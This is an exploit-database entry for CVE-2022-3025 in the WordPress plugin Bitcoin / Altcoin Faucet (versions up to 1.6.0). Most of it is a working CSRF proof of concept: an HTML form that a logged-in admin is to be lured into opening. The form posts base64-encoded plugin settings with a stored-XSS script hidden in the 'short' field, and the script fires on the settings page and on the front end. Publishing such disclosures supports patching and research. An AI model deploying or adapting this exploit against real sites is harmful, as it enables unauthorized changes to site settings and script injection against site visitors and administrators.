Exploit for Bitcoin / Altcoin Faucet <= 1.6.0 - Settings Update to Stored XSS via CSRF CVE-2022-3025

Name: Exploit for Bitcoin / Altcoin Faucet <= 1.6.0 - Settings Update to Stored XSS via CSRF CVE-2022-3025
Rating: 5 (242 reviews)
2022-08-31 | CVSS 0.3
## https://sploitus.com/exploit?id=WPEX-ID:66BC783B-67E1-4BD0-99C0-322873B3A22A
Make a logged in admin open a page containing the HTML code below

<form action="https://example.com/wp-admin/options-general.php?page=bitcoin_faucet" method="POST">
    <input type="text" name="encoded_data" value="bmFtZT1CaXRjb2luK0ZhdWNldCZzaG9ydD0lMjIlM0UlM0NzY3JpcHQlM0VhbGVydCglMkZYU1MlMkYpJTNDJTJGc2NyaXB0JTNFJnNlcnZpY2U9Y3J5cHRvbyZhcGlrZXk9JmN1cnJlbmN5PUJUQyZyZWZlcnJhbD0yMCZ0aW1lcj02MCZyZXdhcmRzPTkwKjEwLTIwJTJDKzEwKjEwLTUwJmRlZmF1bHRfY2FwdGNoYT1SYWluQ2FwdGNoYSZjcnlwdG9sb290X3NpdGVfa2V5PSZjcnlwdG9sb290X3NlY3JldF9rZXk9JmNyeXB0b2xvb3RfaGFzaGVzPTUxMiZyYWluY2FwdGNoYV9wdWJsaWNfa2V5PSZyYWluY2FwdGNoYV9zZWNyZXRfa2V5PSZyZWNhcHRjaGFfcHVibGljX2tleT0mcmVjYXB0Y2hhX3ByaXZhdGVfa2V5PSZmdW5jYXB0Y2hhX3B1YmxpY19rZXk9JmZ1bmNhcHRjaGFfcHJpdmF0ZV9rZXk9JnNvbHZlbWVkaWFfY2hhbGxlbmdlX2tleT0mc29sdmVtZWRpYV92ZXJpZmljYXRpb25fa2V5PSZzb2x2ZW1lZGlhX2F1dGhfa2V5PSZ0ZW1wbGF0ZT1kZWZhdWx0JmN1c3RvbV9hZG1pbl9saW5rX2RlZmF1bHQ9dHJ1ZSZjdXN0b21fcGFsZXR0ZV9kZWZhdWx0PWRlZmF1bHQmY3VzdG9tX2JvZHlfYmdfZGVmYXVsdD0mY3VzdG9tX2JvZHlfdHhfZGVmYXVsdD0mY3VzdG9tX2JveF90b3BfYmdfZGVmYXVsdD0mY3VzdG9tX2JveF90b3BfdHhfZGVmYXVsdD0mY3VzdG9tX21haW5fYm94X2JnX2RlZmF1bHQ9JmN1c3RvbV9tYWluX2JveF90eF9kZWZhdWx0PSZjdXN0b21fYm94X2xlZnRfYmdfZGVmYXVsdD0mY3VzdG9tX2JveF9sZWZ0X3R4X2RlZmF1bHQ9JmN1c3RvbV9ib3hfcmlnaHRfYmdfZGVmYXVsdD0mY3VzdG9tX2JveF9yaWdodF90eF9kZWZhdWx0PSZjdXN0b21fYm94X2JvdHRvbV9iZ19kZWZhdWx0PSZjdXN0b21fYm94X2JvdHRvbV90eF9kZWZhdWx0PSZjdXN0b21fZXh0cmFfY29kZV9OT0JPWF9kZWZhdWx0PSUzQ3N0eWxlJTNFJTBEJTBBJTJGKitjdXN0b21fY3NzKyolMkYlMEQlMEElMkYqK2NlbnRlcitldmVyeXRoaW5nISsqJTJGJTBEJTBBLnJvdyslN0IlMEQlMEErKysrdGV4dC1hbGlnbiUzQStjZW50ZXIlM0IlMEQlMEElN0QlMEQlMEElMjNyZWNhcHRjaGFfd2lkZ2V0X2RpdiUyQyslMjNyZWNhcHRjaGFfYXJlYSslN0IlMEQlMEErKysrbWFyZ2luJTNBKzArYXV0byUzQiUwRCUwQSU3RCUwRCUwQSUyRiorZG8rbm90K2NlbnRlcitsaXN0cysqJTJGJTBEJTBBdWwlMkMrb2wrJTdCJTBEJTBBKysrK3RleHQtYWxpZ24lM0ErbGVmdCUzQiUwRCUwQSU3RCslMEQlMEElM0MlMkZzdHlsZSUzRSZjdXN0b21fYm94X3RvcF9kZWZhdWx0PSZjdXN0b21fYm94X2xlZnRfZGVmYXVsdD0mY3VzdG9tX2JveF9yaWdodF9kZWZhdWx0PSZjdXN0b21fYm94X2JvdHRvbV9kZWZhdWx0PSZibG9ja19hZGJsb2NrPW9uJmhvc3RuYW1lX2Jhbl9saXN0PSZhc25fYmFuX2xpc3Q9JmNvdW50cnlfYmFuX2xpc3Q9JmlwX2Jhbl9saXN0PSZhZGRyZXNzX2Jhbl9saXN0PSZpcF93aGl0ZV9saXN0PSZyZXZlcnNlX3Byb3h5PW9uJnRyb2ZfcmV3YXJkc192aWV3X21vZGU9cmFuZ2UmdHJvZl9oaWRlX2ZhdWNldF9iYWxhbmNlPW5vJmJ1dHRvbl90aW1lcj01JnNlbmRfY29pbnNfYW1vdW50PTEmc2VuZF9jb2luc19hZGRyZXNzPQ%3D%3D">
    <input type="text" name="save_settings" value="Save Changes">
    <input type="submit" name="submit" value="submit">
</form>

The XSS (payload is in the short parameter of the base64 encoded data above) will be triggered when viewing the settings again, as well as in the frontend page/post where the [WPBF] shortcode is embed